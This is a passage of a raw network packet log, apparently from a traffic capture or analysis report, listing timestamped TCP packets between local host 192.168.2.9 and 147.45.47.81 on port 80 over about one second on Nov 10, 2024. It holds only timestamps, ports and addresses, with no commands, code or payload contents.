                                                                                                                                                                                Nov 10, 2024 09:18:25.670984030 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.670995951 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.671020985 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.672065973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.672077894 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.672089100 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.672108889 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.672126055 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.713602066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.713624954 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.713637114 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.713671923 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.739006042 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739018917 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739041090 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739053011 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739063978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739069939 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.739126921 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.739151955 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739161968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739195108 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.739202023 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739238977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739280939 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.739289999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739394903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739408016 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739439964 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.739491940 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739504099 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739516020 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739527941 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739536047 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.739563942 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.739722967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739758968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739763021 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.739850044 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739861965 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739872932 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.739888906 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.739911079 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.739980936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.740021944 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.740034103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.740061998 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.740195990 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.740207911 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.740219116 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.740237951 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.740259886 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.740436077 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.740447044 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.740458012 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.740479946 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.786541939 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.786561012 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.786597967 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.787890911 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.787935019 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.787935019 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.787956953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.788016081 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.829271078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.829292059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.829304934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.829344034 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.855003119 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855041981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855047941 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.855055094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855074883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855087042 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855087996 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.855102062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855123043 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.855174065 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855185986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855197906 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855220079 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.855247974 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.855257034 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855328083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855343103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855355024 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855365038 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.855366945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855391979 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.855936050 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.855974913 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.856128931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.856144905 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.856158018 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.856169939 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.856180906 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.856183052 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.856195927 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.856208086 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.856208086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.856220007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.856232882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.856237888 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.856245041 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.856266975 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.856293917 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.856408119 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.856420040 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.856431007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.856461048 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.902199984 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.903990984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.904016018 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.904036045 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.904057026 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.904094934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.904135942 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.904136896 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.904148102 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.904182911 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.944799900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.944833994 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.944847107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.944890022 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.970540047 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.970571041 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.970590115 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.970597029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.970602036 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.970613003 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.970630884 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.970657110 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.970776081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.970788002 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.970801115 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.970812082 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.970833063 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.970846891 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.971002102 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971020937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971030951 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971056938 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971061945 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.971092939 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.971251965 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971266985 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971302032 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.971328974 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971467018 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971477985 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971489906 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971503019 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971504927 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.971530914 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.971698046 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971735954 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.971739054 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971751928 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971790075 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971796036 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.971801996 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.971843004 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.972111940 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.972125053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.972142935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.972156048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.972165108 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:25.972167969 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:25.972193956 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.019612074 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.019634962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.019650936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.019658089 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.019673109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.019685984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.019689083 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.019699097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.019718885 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.072096109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.072110891 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.072125912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.072151899 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.072179079 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.086253881 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.086266994 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.086277962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.086308002 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.086349964 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.086363077 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.086374998 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.086385965 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.086411953 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.086414099 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.086426020 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.086437941 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.086456060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.086473942 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.086476088 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.086488962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.086500883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.086503029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.086525917 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.087080956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087094069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087104082 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087124109 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.087136030 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.087192059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087209940 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087223053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087235928 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087249041 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087270021 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.087276936 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.087553978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087594032 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.087601900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087614059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087649107 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.087698936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087793112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087804079 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087817907 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087826014 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.087831020 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.087856054 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.088037014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.088073015 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.088099957 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.088110924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.088150024 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.135508060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.135540009 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.135552883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.135669947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.135684013 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.135699034 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.135732889 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.187745094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.187767029 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.187779903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.187793016 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.187853098 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.187853098 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.201797009 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.201809883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.201819897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.201858044 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.201874971 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.201886892 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.201916933 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.201951981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.201965094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.201977968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.201989889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.201992989 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.202012062 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.202208042 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202219963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202230930 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202243090 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202245951 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.202275991 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.202461004 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202471018 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202507019 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.202558994 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202570915 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202583075 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202599049 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.202624083 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.202735901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202748060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202759981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202796936 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.202912092 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202924013 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202935934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202954054 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.202979088 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.202980042 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.202992916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.203038931 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.203268051 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.203299046 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.203319073 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.203330994 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.203358889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.203372002 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.203389883 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:26.203666925 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.203680038 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.203691006 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:26.203704119 CET4983380192.168.2.9147.45.47.81
